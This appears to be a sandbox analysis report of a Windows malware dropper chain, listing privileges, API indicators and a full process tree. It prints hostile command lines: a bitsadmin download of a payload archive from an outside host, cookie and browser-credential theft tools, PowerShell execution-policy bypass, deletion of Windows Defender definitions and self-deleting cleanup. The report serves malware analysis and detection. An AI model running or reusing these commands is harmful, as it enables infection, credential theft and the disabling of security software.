Token: SeRemoteShutdownPrivilege	7628	installer.exe
Token: SeUndockPrivilege	7628	installer.exe
Token: SeSyncAgentPrivilege	7628	installer.exe
Token: SeEnableDelegationPrivilege	7628	installer.exe
Token: SeManageVolumePrivilege	7628	installer.exe
Token: SeImpersonatePrivilege	7628	installer.exe
Token: SeCreateGlobalPrivilege	7628	installer.exe
Token: SeCreateTokenPrivilege	7628	installer.exe
Token: SeAssignPrimaryTokenPrivilege	7628	installer.exe

Suspicious use of FindShellTrayWindow 9 IoCs

pid	Process
1000	ultramediaburner.tmp
1456	iexplore.exe
7628	installer.exe
1264	Process not Found
1264	Process not Found
1264	Process not Found
1264	Process not Found
1264	Process not Found
1264	Process not Found

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
1264	Process not Found

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
1456	iexplore.exe
1456	iexplore.exe
660	IEXPLORE.EXE
660	IEXPLORE.EXE
660	IEXPLORE.EXE
660	IEXPLORE.EXE
10028	4309.exe
10064	4BFF.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 308 wrote to memory of 1984	308	Install2.exe	26
PID 308 wrote to memory of 1984	308	Install2.exe	26
PID 308 wrote to memory of 1984	308	Install2.exe	26
PID 308 wrote to memory of 1984	308	Install2.exe	26
PID 308 wrote to memory of 1984	308	Install2.exe	26
PID 308 wrote to memory of 1984	308	Install2.exe	26
PID 308 wrote to memory of 1984	308	Install2.exe	26
PID 1984 wrote to memory of 368	1984	Install2.tmp	32
PID 1984 wrote to memory of 368	1984	Install2.tmp	32
PID 1984 wrote to memory of 368	1984	Install2.tmp	32
PID 1984 wrote to memory of 368	1984	Install2.tmp	32
PID 368 wrote to memory of 880	368	Ultra.exe	33
PID 368 wrote to memory of 880	368	Ultra.exe	33
PID 368 wrote to memory of 880	368	Ultra.exe	33
PID 368 wrote to memory of 880	368	Ultra.exe	33
PID 368 wrote to memory of 880	368	Ultra.exe	33
PID 368 wrote to memory of 880	368	Ultra.exe	33
PID 368 wrote to memory of 880	368	Ultra.exe	33
PID 880 wrote to memory of 1000	880	ultramediaburner.exe	34
PID 880 wrote to memory of 1000	880	ultramediaburner.exe	34
PID 880 wrote to memory of 1000	880	ultramediaburner.exe	34
PID 880 wrote to memory of 1000	880	ultramediaburner.exe	34
PID 880 wrote to memory of 1000	880	ultramediaburner.exe	34
PID 880 wrote to memory of 1000	880	ultramediaburner.exe	34
PID 880 wrote to memory of 1000	880	ultramediaburner.exe	34
PID 1000 wrote to memory of 1928	1000	ultramediaburner.tmp	35
PID 1000 wrote to memory of 1928	1000	ultramediaburner.tmp	35
PID 1000 wrote to memory of 1928	1000	ultramediaburner.tmp	35
PID 1000 wrote to memory of 1928	1000	ultramediaburner.tmp	35
PID 368 wrote to memory of 868	368	Ultra.exe	36
PID 368 wrote to memory of 868	368	Ultra.exe	36
PID 368 wrote to memory of 868	368	Ultra.exe	36
PID 368 wrote to memory of 1104	368	Ultra.exe	37
PID 368 wrote to memory of 1104	368	Ultra.exe	37
PID 368 wrote to memory of 1104	368	Ultra.exe	37
PID 868 wrote to memory of 1456	868	Kixeshufadae.exe	39
PID 868 wrote to memory of 1456	868	Kixeshufadae.exe	39
PID 868 wrote to memory of 1456	868	Kixeshufadae.exe	39
PID 1456 wrote to memory of 660	1456	iexplore.exe	40
PID 1456 wrote to memory of 660	1456	iexplore.exe	40
PID 1456 wrote to memory of 660	1456	iexplore.exe	40
PID 1456 wrote to memory of 660	1456	iexplore.exe	40
PID 1104 wrote to memory of 8364	1104	Cyshupaelaenu.exe	43
PID 1104 wrote to memory of 8364	1104	Cyshupaelaenu.exe	43
PID 1104 wrote to memory of 8364	1104	Cyshupaelaenu.exe	43
PID 8364 wrote to memory of 8532	8364	cmd.exe	45
PID 8364 wrote to memory of 8532	8364	cmd.exe	45
PID 8364 wrote to memory of 8532	8364	cmd.exe	45
PID 8364 wrote to memory of 8532	8364	cmd.exe	45
PID 1104 wrote to memory of 7556	1104	Cyshupaelaenu.exe	46
PID 1104 wrote to memory of 7556	1104	Cyshupaelaenu.exe	46
PID 1104 wrote to memory of 7556	1104	Cyshupaelaenu.exe	46
PID 7556 wrote to memory of 7628	7556	cmd.exe	48
PID 7556 wrote to memory of 7628	7556	cmd.exe	48
PID 7556 wrote to memory of 7628	7556	cmd.exe	48
PID 7556 wrote to memory of 7628	7556	cmd.exe	48
PID 7556 wrote to memory of 7628	7556	cmd.exe	48
PID 7556 wrote to memory of 7628	7556	cmd.exe	48
PID 7556 wrote to memory of 7628	7556	cmd.exe	48
PID 1104 wrote to memory of 7724	1104	Cyshupaelaenu.exe	49
PID 1104 wrote to memory of 7724	1104	Cyshupaelaenu.exe	49
PID 1104 wrote to memory of 7724	1104	Cyshupaelaenu.exe	49
PID 7724 wrote to memory of 5664	7724	cmd.exe	51
PID 7724 wrote to memory of 5664	7724	cmd.exe	51

C:\Users\Admin\AppData\Local\Temp\Install2.exe
"C:\Users\Admin\AppData\Local\Temp\Install2.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:308
- C:\Users\Admin\AppData\Local\Temp\is-HACEN.tmp\Install2.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-HACEN.tmp\Install2.tmp" /SL5="$2015A,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install2.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1984
- - C:\Users\Admin\AppData\Local\Temp\is-UI9Q3.tmp\Ultra.exe
    "C:\Users\Admin\AppData\Local\Temp\is-UI9Q3.tmp\Ultra.exe" /S /UID=burnerch1
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    PID:368
  - - C:\Program Files\Google\INRGESTXYG\ultramediaburner.exe
      "C:\Program Files\Google\INRGESTXYG\ultramediaburner.exe" /VERYSILENT
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:880
    - - C:\Users\Admin\AppData\Local\Temp\is-5GADD.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-5GADD.tmp\ultramediaburner.tmp" /SL5="$80128,281924,62464,C:\Program Files\Google\INRGESTXYG\ultramediaburner.exe" /VERYSILENT
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:1000
      - C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        6⤵
        Executes dropped EXE
        
        PID:1928
  - - C:\Users\Admin\AppData\Local\Temp\f6-a45da-987-7b4b7-e3d0646926e4d\Kixeshufadae.exe
      "C:\Users\Admin\AppData\Local\Temp\f6-a45da-987-7b4b7-e3d0646926e4d\Kixeshufadae.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:868
    - - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
        5⤵
        Modifies Internet Explorer settings
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:1456
      - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1456 CREDAT:275457 /prefetch:2
        6⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:660
  - - C:\Users\Admin\AppData\Local\Temp\1b-a55b2-da8-2c2ba-229ccf8456bf6\Cyshupaelaenu.exe
      "C:\Users\Admin\AppData\Local\Temp\1b-a55b2-da8-2c2ba-229ccf8456bf6\Cyshupaelaenu.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1104
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ysypdacp.qtj\001.exe & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:8364
      - C:\Users\Admin\AppData\Local\Temp\ysypdacp.qtj\001.exe
        
        C:\Users\Admin\AppData\Local\Temp\ysypdacp.qtj\001.exe
        6⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:8532
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wovazexn.ym3\installer.exe /qn CAMPAIGN="654" & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:7556
      - C:\Users\Admin\AppData\Local\Temp\wovazexn.ym3\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\wovazexn.ym3\installer.exe /qn CAMPAIGN="654"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates connected drives
        Modifies system certificate store
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:7628
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\wovazexn.ym3\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\wovazexn.ym3\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1619879507 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
        7⤵
        
        PID:9028
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\h1vsuqz1.yts\gpooe.exe & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:7724
      - C:\Users\Admin\AppData\Local\Temp\h1vsuqz1.yts\gpooe.exe
        
        C:\Users\Admin\AppData\Local\Temp\h1vsuqz1.yts\gpooe.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        Modifies system certificate store
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:5664
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        Executes dropped EXE
        
        PID:8260
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        Executes dropped EXE
        
        PID:8760
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aptfc42s.p2q\askinstall39.exe & exit
        5⤵
        
        PID:9796
      - C:\Users\Admin\AppData\Local\Temp\aptfc42s.p2q\askinstall39.exe
        
        C:\Users\Admin\AppData\Local\Temp\aptfc42s.p2q\askinstall39.exe
        6⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:9844
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        7⤵
        
        PID:2512
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        8⤵
        Kills process with taskkill
        
        PID:4016
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\d0ybarfv.xyc\setup.exe & exit
        5⤵
        
        PID:10032
      - C:\Users\Admin\AppData\Local\Temp\d0ybarfv.xyc\setup.exe
        
        C:\Users\Admin\AppData\Local\Temp\d0ybarfv.xyc\setup.exe
        6⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:10068
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\d0ybarfv.xyc\setup.exe"
        7⤵
        
        PID:9712
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        8⤵
        Runs ping.exe
        
        PID:9688
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fttjzhoe.yat\request2.exe & exit
        5⤵
        
        PID:3708
      - C:\Users\Admin\AppData\Local\Temp\fttjzhoe.yat\request2.exe
        
        C:\Users\Admin\AppData\Local\Temp\fttjzhoe.yat\request2.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3736
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:3812
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
        
        parse.exe -f json -b firefox
        8⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:5064
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
        
        parse.exe -f json -b chrome
        8⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:5080
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
        
        parse.exe -f json -b edge
        8⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:5104
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g3h5d3kg.vlb\SunLabsPlayer.exe /S & exit
        5⤵
        
        PID:3832
      - C:\Users\Admin\AppData\Local\Temp\g3h5d3kg.vlb\SunLabsPlayer.exe
        
        C:\Users\Admin\AppData\Local\Temp\g3h5d3kg.vlb\SunLabsPlayer.exe /S
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3880
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst5295.tmp\tempfile.ps1"
        7⤵
        Drops file in Program Files directory
        
        PID:7816
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst5295.tmp\tempfile.ps1"
        7⤵
        
        PID:7712
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst5295.tmp\tempfile.ps1"
        7⤵
        
        PID:4884
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst5295.tmp\tempfile.ps1"
        7⤵
        
        PID:3412
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst5295.tmp\tempfile.ps1"
        7⤵
        
        PID:9348
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst5295.tmp\tempfile.ps1"
        7⤵
        
        PID:9588
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst5295.tmp\tempfile.ps1"
        7⤵
        Checks for any installed AV software in registry
        Drops file in Program Files directory
        
        PID:9908
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
        7⤵
        Download via BitsAdmin
        
        PID:10192
        
        C:\Program Files (x86)\lighteningplayer\data_load.exe
        
        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pfGNXVQDAS5gsjBB -y x C:\zip.7z -o"C:\Program Files\temp_files\"
        7⤵
        Executes dropped EXE
        Drops file in Program Files directory
        
        PID:8780
        
        C:\Program Files (x86)\lighteningplayer\data_load.exe
        
        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pqoEjL4JJuJeAe4u -y x C:\zip.7z -o"C:\Program Files\temp_files\"
        7⤵
        Executes dropped EXE
        
        PID:3440
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst5295.tmp\tempfile.ps1"
        7⤵
        
        PID:3408
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst5295.tmp\tempfile.ps1"
        7⤵
        Drops file in Program Files directory
        
        PID:3480
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst5295.tmp\tempfile.ps1"
        7⤵
        Drops file in Program Files directory
        
        PID:8524
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst5295.tmp\tempfile.ps1"
        7⤵
        
        PID:3472
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst5295.tmp\tempfile.ps1"
        7⤵
        
        PID:3508
        
        C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ogdtzM\ogdtzM.dll" ogdtzM
        7⤵
        
        PID:9292
        
        C:\Windows\system32\rundll32.exe
        
        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ogdtzM\ogdtzM.dll" ogdtzM
        8⤵
        Drops file in System32 directory
        
        PID:9328
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst5295.tmp\tempfile.ps1"
        7⤵
        Drops file in Program Files directory
        
        PID:9456
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst5295.tmp\tempfile.ps1"
        7⤵
        Drops file in Program Files directory
        
        PID:9576
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst5295.tmp\tempfile.ps1"
        7⤵
        Drops file in Program Files directory
        
        PID:9564
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst5295.tmp\tempfile.ps1"
        7⤵
        
        PID:9684
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst5295.tmp\tempfile.ps1"
        7⤵
        
        PID:9612
        
        C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
        
        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
        7⤵
        Executes dropped EXE
        
        PID:9984
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pznibfyo.ahy\005.exe & exit
        5⤵
        
        PID:3896
      - C:\Users\Admin\AppData\Local\Temp\pznibfyo.ahy\005.exe
        
        C:\Users\Admin\AppData\Local\Temp\pznibfyo.ahy\005.exe
        6⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3944
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\13d0o4zk.dmb\ifhwwyy.exe & exit
        5⤵
        
        PID:2584
      - C:\Users\Admin\AppData\Local\Temp\13d0o4zk.dmb\ifhwwyy.exe
        
        C:\Users\Admin\AppData\Local\Temp\13d0o4zk.dmb\ifhwwyy.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:4064
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        Executes dropped EXE
        
        PID:2908
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        Executes dropped EXE
        
        PID:8048
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xcpnwmnc.vaa\toolspab1.exe & exit
        5⤵
        
        PID:3996
      - C:\Users\Admin\AppData\Local\Temp\xcpnwmnc.vaa\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\xcpnwmnc.vaa\toolspab1.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:1164
        
        C:\Users\Admin\AppData\Local\Temp\xcpnwmnc.vaa\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\xcpnwmnc.vaa\toolspab1.exe
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks SCSI registry key(s)
        Suspicious behavior: MapViewOfSection
        
        PID:7824
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0iqxvroh.cdd\GcleanerWW.exe /mixone & exit
        5⤵
        
        PID:9172
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tbultw05.ru4\42a25820.exe & exit
        5⤵
        
        PID:9208
      - C:\Users\Admin\AppData\Local\Temp\tbultw05.ru4\42a25820.exe
        
        C:\Users\Admin\AppData\Local\Temp\tbultw05.ru4\42a25820.exe
        6⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        Suspicious behavior: MapViewOfSection
        
        PID:7908

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:8484
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding D0A4A5C1AAC15C86B19FC0420346F5BB C
  2⤵
  - Loads dropped DLL
  PID:8708
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 2EDE9943DFDF7130DD1896C699E94EAD
  2⤵
  - Blocklisted process makes network request
  - Loads dropped DLL
  PID:7808
- - C:\Windows\SysWOW64\taskkill.exe
    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
    3⤵
    - Kills process with taskkill
    PID:7924
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 89158A50B7D4A905173C6EC7C2D720C6 M Global\MSI0000
  2⤵
  - Loads dropped DLL
  PID:4944

C:\Windows\system32\taskeng.exe
taskeng.exe {ED977E02-D632-4CF8-9CFD-4B3D729D7668} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
PID:4056
- C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 8080
  2⤵
  - Executes dropped EXE
  PID:2476
- C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 8080
  2⤵
  - Executes dropped EXE
  PID:2504
- C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 8080
  2⤵
  - Executes dropped EXE
  PID:2540
- C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080
  2⤵
  - Executes dropped EXE
  PID:2576
- C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080
  2⤵
  - Executes dropped EXE
  PID:2880
- C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080
  2⤵
  - Executes dropped EXE
  PID:2324

C:\Users\Admin\AppData\Local\Temp\4309.exe
C:\Users\Admin\AppData\Local\Temp\4309.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:10028

C:\Users\Admin\AppData\Local\Temp\4BFF.exe
C:\Users\Admin\AppData\Local\Temp\4BFF.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:10064

C:\Users\Admin\AppData\Local\Temp\51E9.exe
C:\Users\Admin\AppData\Local\Temp\51E9.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:10096
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
  2⤵
  PID:1324

C:\Users\Admin\AppData\Local\Temp\588F.exe
C:\Users\Admin\AppData\Local\Temp\588F.exe
1⤵
- Executes dropped EXE
PID:9932

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:9920

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:10056

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:9724

C:\Users\Admin\AppData\Local\Temp\6472.exe
C:\Users\Admin\AppData\Local\Temp\6472.exe
1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:10212
- C:\Windows\SysWOW64\icacls.exe
  icacls "C:\Users\Admin\AppData\Local\8a6bb3f0-5ad8-4062-8c4f-33cb0719bd68" /deny *S-1-1-0:(OI)(CI)(DE,DC)
  2⤵
  - Modifies file permissions
  PID:3672
- C:\Users\Admin\AppData\Local\Temp\6472.exe
  "C:\Users\Admin\AppData\Local\Temp\6472.exe" --Admin IsNotAutoStart IsNotTask
  2⤵
  - Executes dropped EXE
  PID:3688
- - C:\Users\Admin\AppData\Local\b53ee96b-d72a-4c81-aa6f-63cbae4291da\updatewin1.exe
    "C:\Users\Admin\AppData\Local\b53ee96b-d72a-4c81-aa6f-63cbae4291da\updatewin1.exe"
    3⤵
    - Executes dropped EXE
    PID:3908
  - - C:\Users\Admin\AppData\Local\b53ee96b-d72a-4c81-aa6f-63cbae4291da\updatewin1.exe
      "C:\Users\Admin\AppData\Local\b53ee96b-d72a-4c81-aa6f-63cbae4291da\updatewin1.exe" --Admin
      4⤵
      Executes dropped EXE
      PID:3868
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned
        5⤵
        
        PID:3588
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -NoProfile -ExecutionPolicy Bypass -Command "& {Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -File ""C:\Users\Admin\AppData\Local\script.ps1""' -Verb RunAs}"
        5⤵
        
        PID:2908
    - - C:\Program Files\Windows Defender\mpcmdrun.exe
        
        "C:\Program Files\Windows Defender\mpcmdrun.exe" -removedefinitions -all
        5⤵
        Deletes Windows Defender Definitions
        
        PID:7796
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\delself.bat""
